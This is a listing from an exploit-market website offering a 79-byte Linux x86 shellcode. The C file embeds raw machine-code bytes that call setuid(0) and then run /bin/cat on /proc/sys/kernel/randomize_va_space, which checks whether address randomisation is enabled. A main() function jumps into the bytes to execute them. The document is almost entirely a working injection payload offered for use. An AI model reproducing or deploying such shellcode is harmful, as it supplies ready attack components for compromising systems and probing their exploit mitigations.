[ authorization ] [ registration ] [ Restaurar ]
Contactanos
No puedes contactar por:
0day.today Exploits Market and 0day Exploits Database

linux/x86 to see /proc/sys/kernel/randomize_va_space - 79 bytes

Autor
Febriyanto Nugroho
Riesgo
[
Security Risk Low
]
0day-ID
0day-ID-23546
Categoria
shellcode
Fecha
21-04-2015
Platforma
linux/x86
/*

 # Exploit Title  : linux/x86 execve("/bin/cat", ["/bin/cat", "/proc/sys/kernel/randomize_va_space"], NULL) - 79 bytes
 # Exploit Author : Febriyanto Nugroho 
 # Tested on      : Linux Debian 5.0.5

 */

#include <stdio.h>

char shellcode[] = "\x31\xdb"
                   "\x6a\x17"
                   "\x58"
                   "\xcd\x80"
		   "\x8d\x43\x0b"
		   "\x99"
		   "\x52"
		   "\x68\x2f\x63\x61\x74"
		   "\x68\x2f\x62\x69\x6e"
		   "\x89\xe3"
		   "\x52"
                   "\x68\x61\x63\x65\x2f"
                   "\x68\x61\x5f\x73\x70"
                   "\x68\x7a\x65\x5f\x76"
		   "\x68\x64\x6f\x6d\x69"
		   "\x68\x2f\x72\x61\x6e"
		   "\x68\x72\x6e\x65\x6c"
		   "\x68\x73\x2f\x6b\x65"
		   "\x68\x63\x2f\x73\x79"
		   "\x68\x2f\x70\x72\x6f"
		   "\x89\xe1"
		   "\x52"
		   "\x51"
		   "\x53"
		   "\x89\xe1"
		   "\xcd\x80";

int main(int argc, char **argv) {
asm("jmp %0;" : "=m" (shellcode));  
}


#  0day.today [2024-07-01]  #